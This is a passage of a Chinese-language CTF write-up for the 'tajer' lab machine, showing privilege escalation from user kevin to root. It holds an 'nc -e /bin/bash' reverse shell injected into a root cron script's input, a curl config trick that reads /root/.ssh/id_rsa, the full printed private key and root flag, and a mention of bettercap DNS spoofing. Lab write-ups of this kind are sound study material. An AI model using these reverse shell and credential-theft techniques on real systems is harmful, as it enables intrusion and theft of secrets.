data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840121.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406172550145\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u672c\u673a\u8bbf\u95ee\u6b63\u5e38\uff0c\u656c\u5019\u4f73\u97f3\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840122.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840122.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406172845880\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f39\u56de\u6765\u4e86\uff01<\/p>\n<h3>\u63d0\u6743\u81f3root<\/h3>\n<p>\u6211wifi\u5361\u65ad\u6389\u4e86\u4e00\u4e0b\uff0c\u91cd\u65b0\u4f7f\u7528pwncat\u4e86\uff0c\u8fd9\u6837\u73af\u5883\u6bd4\u8f83\u597d\u64cd\u4f5c\uff0c\u4e0d\u8fc7\u4e5f\u6ca1\u5565\u533a\u522b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) kevin@tajer:\/home\/kevin$ ls\nuser.txt\n(remote) kevin@tajer:\/home\/kevin$ sudo -l\nsudo: unable to resolve host tajer: Name or service not known\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for kevin: \nSorry, try again.\n[sudo] password for kevin: \nSorry, try again.\n[sudo] password for kevin: \nsudo: 3 incorrect password attempts\n(remote) kevin@tajer:\/home\/kevin$ cd \/\n(remote) kevin@tajer:\/$ ls -la\ntotal 68\ndrwxr-xr-x  18 root root  4096 Mar 31  2022 .\ndrwxr-xr-x  18 root root  4096 Mar 31  2022 ..\nlrwxrwxrwx   1 root root     7 Jan 12  2022 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root  4096 Mar 31  2022 boot\ndrwxr-xr-x  17 root root  3140 Apr  6 02:55 dev\ndrwxr-xr-x  80 root root  4096 Apr  6 02:55 etc\ndrwxr-xr-x   3 root root  4096 Apr  1  2022 home\nlrwxrwxrwx   1 root root    31 Mar 31  2022 initrd.img -&gt; boot\/initrd.img-5.10.0-13-amd64\nlrwxrwxrwx   1 root root    31 Mar 31  2022 initrd.img.old -&gt; boot\/initrd.img-5.10.0-13-amd64\nlrwxrwxrwx   1 root root     7 Jan 12  2022 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Jan 12  2022 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root     9 Jan 12  2022 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root    10 Jan 12  2022 libx32 -&gt; usr\/libx32\ndrwx------   2 root root 16384 Jan 12  2022 lost+found\ndrwxr-xr-x   3 root root  4096 Jan 12  2022 media\ndrwxr-xr-x   2 root root  4096 Jan 12  2022 mnt\ndrwxrwxrwx   4 root root  4096 Apr  1  2022 opt\ndr-xr-xr-x 155 root root     0 Apr  6 02:55 proc\ndrwx------   3 root root  4096 Apr  1  2022 root\ndrwxr-xr-x  19 root root   560 Apr  6 02:55 run\nlrwxrwxrwx   1 root root     8 Jan 12  2022 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root  4096 Jan 12  2022 srv\ndr-xr-xr-x  13 root root     0 Apr  6 02:55 sys\ndrwxrwxrwt   9 root root  4096 Apr  6 05:09 tmp\ndrwxr-xr-x  14 root root  4096 Jan 12  2022 usr\ndrwxr-xr-x  12 root root  4096 Mar 31  2022 var\nlrwxrwxrwx   1 root root    28 Mar 31  2022 vmlinuz -&gt; boot\/vmlinuz-5.10.0-13-amd64\nlrwxrwxrwx   1 root root    28 Mar 31  2022 vmlinuz.old -&gt; boot\/vmlinuz-5.10.0-13-amd64\n(remote) kevin@tajer:\/$ cd \/bin\/local\nbash: cd: \/bin\/local: No such file or directory\n(remote) kevin@tajer:\/$ cd usr\/local\/bin\n(remote) kevin@tajer:\/usr\/local\/bin$ ls -la\ntotal 80\ndrwxr-xr-x  3 root root 4096 Apr  1  2022 .\ndrwxr-xr-x 10 root root 4096 Jan 12  2022 ..\n-rwxr-xr-x  1 root root  215 Mar 31  2022 cmark\n-rwxr-xr-x  1 root root  214 Mar 31  2022 deep\n-rwxr-xr-x  1 root root  207 Mar 31  2022 dotenv\n-rwxr-xr-x  1 root root 1651 Mar 31  2022 get_objgraph\n-rwxr-xr-x  1 root root 1695 Mar 31  2022 jp.py\n-rwxr-xr-x  1 root root  211 Mar 31  2022 pbr\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip3\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip3.9\ndrwxr-xr-x  2 root root 4096 Mar 31  2022 __pycache__\n-rwxr-xr-x  1 root root  216 Apr  1  2022 pydisasm\n-rwxr-xr-x  1 root root  215 Mar 31  2022 pygmentize\n-rwxr-xr-x  1 root root  205 Mar 31  2022 pysemver\n-rwxr-xr-x  1 root root  205 Mar 31  2022 pytail\n-rwxr-xr-x  1 root root 2078 Apr  1  2022 spark-parser-coverage\n-rwxr-xr-x  1 root root  209 Mar 31  2022 tabulate\n-rwxr-xr-x  1 root root  587 Mar 31  2022 undill\n-rwxr-xr-x  1 root root  208 Mar 31  2022 wheel\n(remote) kevin@tajer:\/usr\/local\/bin$ cd \/opt\n(remote) kevin@tajer:\/opt$ ls -la\ntotal 16\ndrwxrwxrwx  4 root root  4096 Apr  1  2022 .\ndrwxr-xr-x 18 root root  4096 Mar 31  2022 ..\ndrwxrwx---  2 root kevin 4096 Apr  1  2022 kevin\ndrwxr-xr-x  2 root root  4096 Apr  1  2022 scripts\n(remote) kevin@tajer:\/opt$ cd kevin\/\n(remote) kevin@tajer:\/opt\/kevin$ ls -la\ncdtotal 8\ndrwxrwx--- 2 root kevin 4096 Apr  1  2022 .\ndrwxrwxrwx 4 root root  4096 Apr  1  2022 ..\n(remote) kevin@tajer:\/opt\/kevin$ cd ..\/scripts\/;ls -la\ntotal 16\ndrwxr-xr-x 2 root root  4096 Apr  1  2022 .\ndrwxrwxrwx 4 root root  4096 Apr  1  2022 ..\n-rw-r--r-- 1 root root   886 Apr  1  2022 code\n-r-x------ 1 root kevin  677 Apr  1  2022 curl.py\n(remote) kevin@tajer:\/opt\/scripts$ file *\ncode:    python 2.7 byte-compiled\ncurl.py: regular file, no read permission<\/code><\/pre>\n<p>\u628a\u6587\u4ef6\u4f20\u8fc7\u6765\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/tajer]\n\u2514\u2500$ file code                                    \ncode: python 2.7 byte-compiled\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/tajer]\n\u2514\u2500$ strings code       \nD&#039;Gbc\nscript is running in every 1 minutei\ndatetimes\n\/opt\/kevin\/input.txtt\n^((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])$s\nInvalid IPi\nfilet\nFILEs\nInvalid Urls\n%H_%M_%Ss&amp;\n\/bin\/bash -c &quot;curl -o \/tmp\/tryHarder_ s\n -K t\nsysR\nopent\nreadlinet\nstript\nuser_inputt\nregext\nboolt\nsearcht\ncheckt\nexitt\nnowt\nstrftimet\ncmdt\nsystem(\ncode.pyt\n&lt;module&gt;<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2a\u53ef\u7591\u6587\u4ef6<code>\/opt\/kevin\/input.txt<\/code>\uff0c\u8fd8\u6709\u4e00\u4e2a\u547d\u4ee4<code>\/bin\/bash -c &quot;curl -o \/tmp\/tryHarder_ s<\/code><\/p>\n<p>\u4f46\u662f\u6211\u4eec\u662f\u6ca1\u6709\u770b\u5230\u6709\u524d\u8005\u5b58\u5728\u7684\uff0c\u6211\u4eec\u5c1d\u8bd5\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u67e5\u770b\u4f1a\u53d1\u751f\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &#039;nc -e \/bin\/bash 172.20.10.8 1234&#039; &gt; input.txt<\/code><\/pre>\n<p>\u989d\uff0c\u8fd9\u70b9\u5c0f\u806a\u660e\u6ca1\u6709\u8d77\u4f5c\u7528\uff0c<code>pspy64<\/code>\u663e\u793a\uff1a<\/p>\n<pre><code class=\"language-text\">2024\/04\/06 05:49:01 CMD: UID=1001 PID=16461  | \/usr\/bin\/bash \n2024\/04\/06 05:49:01 CMD: UID=0    PID=16462  | \/usr\/bin\/python3 \/opt\/scripts\/curl.py \n2024\/04\/06 05:49:01 CMD: UID=0    PID=16463  | sh -c \/bin\/bash -c &#039;curl -o \/tmp\/result_05_49_01 -K nc -e \/bin\/bash 172.20.10.8 1234&#039; <\/code><\/pre>\n<p>\u54c8\u54c8\u54c8\uff0ccurl.py\u662froot\u6267\u884c\u7684\u5b9a\u65f6\u4efb\u52a1\uff0c\u8fd8\u8fd0\u884c\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">sh -c \/bin\/bash -c &#039;curl -o \/tmp\/result_05_49_01 -K nc -e \/bin\/bash 172.20.10.8 1234&#039; <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840123.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840123.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406175259540\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5927\u6982\u610f\u601d\u5c31\u662f\u8bfb\u53d6<code>input.txt<\/code>\u7684\u914d\u7f6e\u6587\u4ef6\u8def\u5f84\uff0c\u7136\u540e\u590d\u5236\u5230tmp\u4e2d\u4e00\u4e2a\u6587\u4ef6\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u60f3\u529e\u6cd5\u6784\u9020\u4e00\u4e0b<code>root\/.ssh\/id_rsa<\/code>\uff0c\u7136\u540e\u4f7f\u7528\u8fd9\u4e2a\u8fdb\u884c\u767b\u5f55\uff01<\/p>\n<pre><code class=\"language-bash\"># input.txt\n\/tmp\/hack\n# \/tmp\/hack\nurl = file:\/\/\/root\/.ssh\/id_rsa<\/code><\/pre>\n<p>\u8bd5\u8bd5\uff01<\/p>\n<pre><code class=\"language-bash\">cd \/opt\/kevin\/\necho &#039;\/tmp\/hack&#039; &gt; input.txt \ncd \/tmp\necho &#039;url = file:\/\/\/root\/.ssh\/id_rsa&#039; &gt; hack<\/code><\/pre>\n<p>\u7136\u540e\u9759\u5019\u4f73\u97f3\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) kevin@tajer:\/tmp$ cd \/opt\/kevin\/\n(remote) kevin@tajer:\/opt\/kevin$ echo &#039;\/tmp\/hack&#039; &gt; input.txt \n(remote) kevin@tajer:\/opt\/kevin$ cd \/tmp\n(remote) kevin@tajer:\/tmp$ echo &#039;url = file:\/\/\/root\/.ssh\/id_rsa&#039; &gt; hack\n(remote) kevin@tajer:\/tmp$ ls -la\ntotal 5280\ndrwxrwxrwt  9 root     root        4096 Apr  6 06:07 .\ndrwxr-xr-x 18 root     root        4096 Mar 31  2022 ..\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .font-unix\n-rw-r--r--  1 kevin    kevin         31 Apr  6 06:07 hack\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .ICE-unix\n-rwxrwxrwx  1 www-data www-data  860549 Mar 25 11:56 linpeas.sh\n-rwxrwxrwx  1 www-data www-data 4468984 Mar 23 04:32 pspy64\n-rw-r--r--  1 root     root         347 Apr  6 05:49 result_05_49_01\n-rw-r--r--  1 root     root         347 Apr  6 05:50 result_05_50_01\n-rw-r--r--  1 root     root         347 Apr  6 05:51 result_05_51_01\n-rw-r--r--  1 root     root         347 Apr  6 05:52 result_05_52_01\n-rw-r--r--  1 root     root         347 Apr  6 05:53 result_05_53_01\n-rw-r--r--  1 root     root         347 Apr  6 05:54 result_05_54_01\n-rw-r--r--  1 root     root         347 Apr  6 05:55 result_05_55_01\ndrwx------  3 root     root        4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-logind.service-GjHWlh\ndrwx------  3 root     root        4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-timesyncd.service-c42Ysf\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .Test-unix\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .X11-unix\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .XIM-unix\n(remote) kevin@tajer:\/tmp$ ls -la\ntotal 5284\ndrwxrwxrwt  9 root     root        4096 Apr  6 06:08 .\ndrwxr-xr-x 18 root     root        4096 Mar 31  2022 ..\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .font-unix\n-rw-r--r--  1 kevin    kevin         31 Apr  6 06:07 hack\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .ICE-unix\n-rwxrwxrwx  1 www-data www-data  860549 Mar 25 11:56 linpeas.sh\n-rwxrwxrwx  1 www-data www-data 4468984 Mar 23 04:32 pspy64\n-rw-r--r--  1 root     root         347 Apr  6 05:49 result_05_49_01\n-rw-r--r--  1 root     root         347 Apr  6 05:50 result_05_50_01\n-rw-r--r--  1 root     root         347 Apr  6 05:51 result_05_51_01\n-rw-r--r--  1 root     root         347 Apr  6 05:52 result_05_52_01\n-rw-r--r--  1 root     root         347 Apr  6 05:53 result_05_53_01\n-rw-r--r--  1 root     root         347 Apr  6 05:54 result_05_54_01\n-rw-r--r--  1 root     root         347 Apr  6 05:55 result_05_55_01\n-rw-r--r--  1 root     root        2602 Apr  6 06:08 result_06_08_01\ndrwx------  3 root     root        4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-logind.service-GjHWlh\ndrwx------  3 root     root        4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-timesyncd.service-c42Ysf\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .Test-unix\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .X11-unix\ndrwxrwxrwt  2 root     root        4096 Apr  6 02:55 .XIM-unix\n(remote) kevin@tajer:\/tmp$ cat result_06_08_01 \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAs9pLCYq5\/lSuraQbmqHsZzj\/2C4zB8bQOch55wOfeX3mUgH3L4S7\nNr4fEFUzWTWTke2HVwIl+7x1GODlQfGxpN8TA+kZ4B5OVDLDzjdOLMBMaBpAbeehbdDK52\nHtjYLRsQp5dCCkBHl0TkEA1CgPHaPZwdHvkU3f\/Syt8wN8TIFm0bOWLR3fG7mrVn+dvUv1\ntpPKbNbEU3hadszcKuYl2N\/Oht2OeWDrZYa+N4ETpTXCZ1mG1z1mRb9oY5u7tfPL9VemyP\nTqEFpjh24miUXCn63w58Uw+wB5OvOuWAMM1fLBiDrdiV+TLzQznw7ocdg3eYG93+tp1WFf\n6uHCNKasQYrRQrjPGEqloxYJTqD7DRmwRWTtRDPLFDlkZAT1c89UnnOOZ1whOD3j9gU6t9\n1majHKG0aL7ERIWI\/2yeksZdaop81CoT9p68cIrtJoze68F0j7rFwPgxJ8F2OtO+YoJJkj\n4bo044EGYEOcYogVxoVqdhpvj18ywCgBncIIT9y9AAAFiArlGZoK5RmaAAAAB3NzaC1yc2\nEAAAGBALPaSwmKuf5Urq2kG5qh7Gc4\/9guMwfG0DnIeecDn3l95lIB9y+Euza+HxBVM1k1\nk5Hth1cCJfu8dRjg5UHxsaTfEwPpGeAeTlQyw843TizATGgaQG3noW3Qyudh7Y2C0bEKeX\nQgpAR5dE5BANQoDx2j2cHR75FN3\/0srfMDfEyBZtGzli0d3xu5q1Z\/nb1L9baTymzWxFN4\nWnbM3CrmJdjfzobdjnlg62WGvjeBE6U1wmdZhtc9ZkW\/aGObu7Xzy\/VXpsj06hBaY4duJo\nlFwp+t8OfFMPsAeTrzrlgDDNXywYg63Ylfky80M58O6HHYN3mBvd\/radVhX+rhwjSmrEGK\n0UK4zxhKpaMWCU6g+w0ZsEVk7UQzyxQ5ZGQE9XPPVJ5zjmdcITg94\/YFOrfdZmoxyhtGi+\nxESFiP9snpLGXWqKfNQqE\/aevHCK7SaM3uvBdI+6xcD4MSfBdjrTvmKCSZI+G6NOOBBmBD\nnGKIFcaFanYab49fMsAoAZ3CCE\/cvQAAAAMBAAEAAAGBAIjAN4P21ns6mmLvQAnwitblsS\nsH3cdQ9SyqcX4k9BIll4XNdszLyKnUH7yEe\/md0ioICHsw5\/6kCgkznz3n72HkOAomKIWP\npZFB1D4tMSS3xqD1LP4kPEtKka0jecO6r4RE6ZpR40R\/sN57cIzgNLYdysojvVunceOIIG\n+Bu\/ZUAgD64vpFF0p2f3\/Sova3FgqQDz94gWjSPz7Lf7CitC5V5iwHtHg4KGRW8rUzUOOy\nn7GDkhKA3g20f0QVusGbr7eoEnU8N\/E1Cpqo+W\/r\/hINUBdC2Fn8Qm9cYQ2d8MSAFGJ4Ui\n9liANsRn\/s0yDlRpGz3co4\/St+B8Kx+oZdS21DyHYGk4bAYzSWMFZH9QGOasO1+zyVx46j\ntK5qvIluV36Nu5VIEWQM5unJDsdMxhv7n1oyFDioW88hvb8Wsg3o2KWRx7ZQR3zowXSZhu\nyPDwoS5wn3DbPRf\/cArthyESoHyKZ1wpzPWMW2ej9WhCH3vZF88QSUumHzUFJgQTZRhQAA\nAMBWgarrj36LhRPkoTAILqxNpmDryZ8xqXQvFyY3DVh4BaPzInjl160mlvZDyUTXE2P6ZM\nrXYPhXkedgoTh7UaNNHiiUSMc1oAWoIrZ7cQKwd\/TmDPD8\/EfSncC0xfPSfWm8+qP\/mXlX\n5g4T3gEFWNVBAQ3E6FI3Tc+4ZPExpRqUw9+8AZkY0ry2DufGchwQ2NFxys4p\/CEQ8vCwDR\npP+LrFisGYlNIy2eNISkUILWy6f2\/0NuhbzOBofelvLfa44CsAAADBAOBXNV9q8HY\/A1jw\n3HX+vctSy\/9uiifwNgui6jNTN3CHxMqZo\/iUZjxWvLhnHYQ\/R31CIG3EjFZPSwqRTRzF7u\nAuilX+GWol2tys7x2iUFSRdp0aHbJAzGVPYZmYKK4N0rJaDrhpVhC4Z6W0ekOl+QlZxdG6\nE0F3xsSM7ufyLf+lpxFVNyKi5Kw6cvY0b8Cakbl1rbS5HVHOi5pzg6nl7zY0slNvY3PkqV\njXGZTIAFwI41otl\/MoWXLlTScSnR+bawAAAMEAzTvcdoxmIGnDOKNLijxrp1SIGhwOjxpz\n63jwMOtAF4FkU+YyHNw20ArlAlQpSEpVWHzVn13s6+EEtypTpbNt5bP5KAJaP7dtl\/oext\nHCe8+7BUzlmKIA6nW+3SYHHd4RBipZPtz6FBXUj1H6CW79quUpWrSOWnUwamLWj0l1Pm3C\nAB8sFJTWBaUJbZ3l825wpm1L5cySGUSJVRLxcFYPOcCr0pN0dlC1I76wPVCF+8BOsct85F\nbJu2rgsqqHsVp3AAAADXJvb3RAZnJlZTRhbGwBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n(remote) kevin@tajer:\/tmp$ chmod 600 result_06_08_01 \nchmod: changing permissions of &#039;result_06_08_01&#039;: Operation not permitted\n(remote) kevin@tajer:\/tmp$ cp result_06_08_01 root\n(remote) kevin@tajer:\/tmp$ chmod 600 root\n(remote) kevin@tajer:\/tmp$ ssh root@127.0.0.1 -i root\nThe authenticity of host &#039;127.0.0.1 (127.0.0.1)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:1IIQzX\/9JIhzpVThO1Os63ec47EM+GUjaOKa9WMeJ7Q.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;127.0.0.1&#039; (ECDSA) to the list of known hosts.\nLinux tajer 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Fri Apr  1 13:51:42 2022\nroot@tajer:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@tajer:~# cd \/root\nroot@tajer:~# cat root.txt\nad8058a084bee8a14a6f23efa52d39d0<\/code><\/pre>\n<p>\u62ff\u5230flag\uff01\uff01\uff01<\/p>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1Tm411r7wX\/?spm_id_from=333.337.search-card.all.click&amp;vd_source=8981ead94b755f367ac539f6ccd37f77\">\u7fa4\u4e3b\u5e08\u5085\u89c6\u9891<\/a>\u63d0\u5230\u7684\u5982\u679c<code>etc\/hosts<\/code>\u65e0\u6cd5\u66f4\u6539\uff0c\u8fd9\u5728\u73b0\u5b9e\u4e2d\u624d\u662f\u6700\u5e38\u89c1\u7684\uff0c\u5982\u4f55\u8fdb\u884cdns\u6b3a\u9a97\uff0c\u8fd9\u5229\u7528\u5230\u4e86\u4e00\u4e2a\u53eb\u505a<code>bettercap<\/code>\u7684\u5de5\u5177\uff1a<\/p>\n<p><a href=\"https:\/\/github.com\/bettercap\/bettercap\">https:\/\/github.com\/bettercap\/bettercap<\/a><\/p>\n<blockquote>\n<p>\u7528\u4e8e 802.11\u3001BLE\u3001IPv4 \u548c IPv6 \u7f51\u7edc\u4fa6\u5bdf\u548c MITM \u653b\u51fb\u7684\u745e\u58eb\u519b\u5200\u3002<\/p>\n<p>bettercap \u662f\u4e00\u4e2a\u7528 Go \u7f16\u5199\u7684\u5f3a\u5927\u3001\u6613\u4e8e\u6269\u5c55\u548c\u53ef\u79fb\u690d\u7684\u6846\u67b6\uff0c\u65e8\u5728\u4e3a\u5b89\u5168\u7814\u7a76\u4eba\u5458\u3001\u7ea2\u961f\u4eba\u5458\u548c\u9006\u5411\u5de5\u7a0b\u5e08\u63d0\u4f9b\u4e00\u79cd<strong>\u6613\u4e8e\u4f7f\u7528\u7684**<\/strong>\u4e00\u4f53\u5316\u89e3\u51b3\u65b9\u6848**\uff0c\u5176\u4e2d\u5305\u542b\u4ed6\u4eec\u6267\u884c\u4fa6\u5bdf\u548c\u653b\u51fb\u53ef\u80fd\u9700\u8981\u7684\u6240\u6709\u529f\u80fd<a href=\"https:\/\/www.bettercap.org\/modules\/wifi\/\">WiFi<\/a>\u7f51\u7edc\u3001<a href=\"https:\/\/www.bettercap.org\/modules\/ble\/\">\u4f4e\u529f\u8017\u84dd\u7259<\/a>\u8bbe\u5907\u3001\u65e0\u7ebf<a href=\"https:\/\/www.bettercap.org\/modules\/hid\/\">HID<\/a>\u8bbe\u5907\u548c<a href=\"https:\/\/www.bettercap.org\/modules\/ethernet\">\u4ee5\u592a\u7f51<\/a>\u3002<\/p>\n<\/blockquote>\n<p>\u4e3a\u4e86\u9632\u6b62\u4f5c\u5f0a\uff0c\u5220\u6389\u4e4b\u524d\u505a\u7684dns\uff1a<\/p>\n<pre><code class=\"language-css\">root@tajer:~# vim \/etc\/hosts\nroot@tajer:~# cat \/etc\/hosts\n127.0.0.1       localhost\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\nroot@tajer:~# ip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:c7:81:88 brd ff:ff:ff:ff:ff:ff\n    inet 172.20.10.4\/28 brd 172.20.10.15 scope global dynamic enp0s3\n       valid_lft 74203sec preferred_lft 74203sec\n    inet6 fe80::a00:27ff:fec7:8188\/64 scope link \n       valid_lft forever preferred_lft forever<\/code><\/pre>\n<p>\u6839\u636e\u7fa4\u4e3b\u89c6\u9891\u7684\u64cd\u4f5c\u8fdb\u884c\u4ee5\u4e0b\u6b65\u9aa4\uff1a\uff08\u7b2c\u4e00\u6b21\u53d1\u73b0\u6ca1\u5f39\u56de\u6765\uff0c\u5413\u6211\u4e00\u8df3\uff0c\u6211\u540e\u6765\u53d1\u73b0\u5f39\u56de\u6765\u7684\u662f2345\u7aef\u53e3\uff0c\u6211\u76d1\u542c\u7684\u662f1234\u7aef\u53e3\u3002\u3002\u3002\uff09<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840125.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840125.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406183125370\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u5fd8\u4e86\u5f00\u542fhttp\u670d\u52a1\u4e86\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840126.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840126.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406183339189\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840127.png'><img class=\"lazyload lazyload-style-2\" 